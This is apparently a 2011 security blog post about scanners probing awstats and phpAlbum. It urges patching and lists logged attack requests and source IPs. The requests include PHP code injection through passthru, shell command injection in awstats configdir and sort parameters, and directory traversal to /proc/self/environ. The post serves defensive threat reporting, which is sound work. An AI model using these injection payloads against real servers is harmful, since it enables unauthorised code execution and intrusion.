19 December 2011

Attacks against awstats also include attacks against phpAlbum

Following up to a post from last Friday regarding the importance of patching, I thought I would update some of the activity we are seeing from the various folks running scans for the awstats vulnerabilities previously mentioned.  It seems that in addition to looking for the various awstats vulnerabilities, the scanners have now added some searches for some vulnerabilities in phpAlbum that were disclosed on Exploit DB at the end of October. 

If you look at the requests made of main.php (below), you can see that the scanner is trying to do PHP code injection to identify vulnerable systems for later exploitation. According to the phpAlbum web site this bug has already been fixed, but I have not independently verified that information.  That being said, it would seem prudent to upgrade your version of phpAlbum. 

Since phpAlbum frequently used with Joomla installations, this is probably closely related to similar activity that Ryan Barnett pointed out recently on the Spiderlabs blog. Note that the scanner is also trying a directory traversal attempt with index.php. 

GET /apps/phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
GET /apps/phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
GET /apps/phpalbum/main.php?var1=1'.passthru('id').';&cmd=setquality
GET /awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d
GET /awstatstotals/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d
GET /awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d
GET /catalog/
GET /cgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;;echo%20YYY;echo|
GET /cgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ[[#0]]
GET /index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ
GET /?mod=../../../../../../proc/self/environ[[#0]]
GET /phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
GET /scgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /scgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /scgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /scgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /scripts/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /site.php?a={${passthru(chr(105).chr(100))}}
GET /stat/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d
GET /stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|


Some additional IPs we have seen involved in this activity are as follows: 

220.162.244.251
218.77.120.135
82.130.140.90
78.46.104.76
202.213.205.172
62.48.74.126
190.196.30.122
209.109.129.166